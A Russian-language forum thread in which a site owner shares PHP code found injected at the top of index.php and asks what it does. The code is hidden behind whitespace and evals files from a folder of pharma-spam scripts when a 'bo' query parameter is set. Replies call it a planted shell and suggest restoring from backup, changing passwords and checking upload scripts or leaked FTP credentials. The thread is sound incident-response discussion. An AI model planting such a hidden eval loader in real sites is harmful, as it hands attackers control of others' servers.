Нужна помощь: вроде сайт взломали и что это за PHP-код

Alexej

Коллеги, доброго времени суток. Нужна помощь. Вот такой код разметился в самом начале index.php на сайте. Что это? Какие-нибудь подробности?

PHP:
  1. <?                                                                                                                                                                     error_reporting(0); ini_set(‘display_errors’, ‘Off’); if(isset($_GET[‘bo’])) { header(‘Content-Type: text/html; charset=utf-8’); $p=array_pop(@preg_split(«!/!»,$_GET[‘bo’])); echo eval/**/(‘?>’.join(«»,file(«css/main/bon/$p«)).‘<?’); die; }?>

Вот в этом самом css/mail/bon навалилась гора php-файлов на фарм-тему.
Заранее спасибо.

 

mkramer

Что делает код — не так важно. Вам залили шел, важно понять как. Естественно, после восстановления сайта с бэкапа и смены всех возможных паролей.

Подозреваемые — скрипты, позволяющие пользователям закачивать файлы на сайт.

 

Drunkenmunky

Не обязательно.
В Total Commander, помнится, была уязвимость с доступом к хранимым паролям от FTP.

 

mkramer

@Drunkenmunky Согласен. Компрометация через уязвимости ПО — тоже вариант.

 

Taktreba

а мне кстатит интересно что делает код ) я ничего не понимаю

 

mkramer

@Taktreba По приведённому фрагменту относительно безобидно — подменяет контент сайта на свой, в определённых случаях.
— Добавлено —
Но я не видел файлы, которые он подключает. Может там всё и не так радужно.

 

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *